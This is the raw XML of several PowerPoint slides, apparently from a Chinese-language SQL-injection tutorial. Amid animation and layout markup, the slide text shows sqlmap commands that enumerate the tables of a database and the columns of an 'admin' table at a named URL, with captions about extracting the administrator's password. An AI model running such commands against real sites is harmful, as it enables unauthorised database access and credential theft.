                                        <p:tgtEl>
                                          <p:spTgt spid="248"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="248"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="248"/>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 grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="249" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="246" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="248" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="245" grpId="1"/>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image28.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="577850" y="1055687"/>
            <a:ext cx="11847514" cy="5545138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Shape 252"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5530850" y="7966074"/>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得到表名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Shape 253"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="708919" y="7483475"/>
            <a:ext cx="11585373"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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u “http://www.sysorem.xyz/test.php?id=3”  -D zvuldrill -tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Shape 254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5986462" y="4507705"/>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82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>表名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="image29.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="9903662">
            <a:off x="1739900" y="5287962"/>
            <a:ext cx="4173538" cy="3508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3" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="251"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(horizontal)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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19" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="253"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="253"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="253"/>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0" presetID="19" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="252"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="252"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25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5" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="254"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="254"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="254"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25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5" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="255"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="255"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="255"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="255"/>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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="255" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="254" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="252" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="253" grpId="2"/>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image30.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311150" y="725487"/>
            <a:ext cx="12382500" cy="5232402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5073650" y="7966074"/>
            <a:ext cx="28575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得到表的字段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Shape 259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556101" y="7515225"/>
            <a:ext cx="1189101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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u “http://www.sysorem.xyz/test.php?id=3”  -D zvuldrill -T admin —columns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="260" name="image31.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="9789314">
            <a:off x="3556000" y="4662487"/>
            <a:ext cx="2619375" cy="352427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Shape 261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156325" y="4013992"/>
            <a:ext cx="14859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82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>字段名</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57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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19" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="259"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="259"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25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0" presetID="19" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25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5" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="261"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="261"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="261"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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6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5" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>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6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4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="260" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="258" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="259" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="257"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image32.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1420812" y="3173411"/>
            <a:ext cx="10161589" cy="1938339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Shape 264"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4157661" y="5989636"/>
            <a:ext cx="4686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得到管理员的账户密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Shape 265"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9339262" y="3407567"/>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82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>得到内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="266" name="image33.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10332531">
            <a:off x="7153275" y="3697287"/>
            <a:ext cx="2214564" cy="3524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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0" fmla="#ppt_w*sin(2.5*pi*$)">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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5" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="266"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="266"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="266"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26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6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5" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="265"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="265"/>
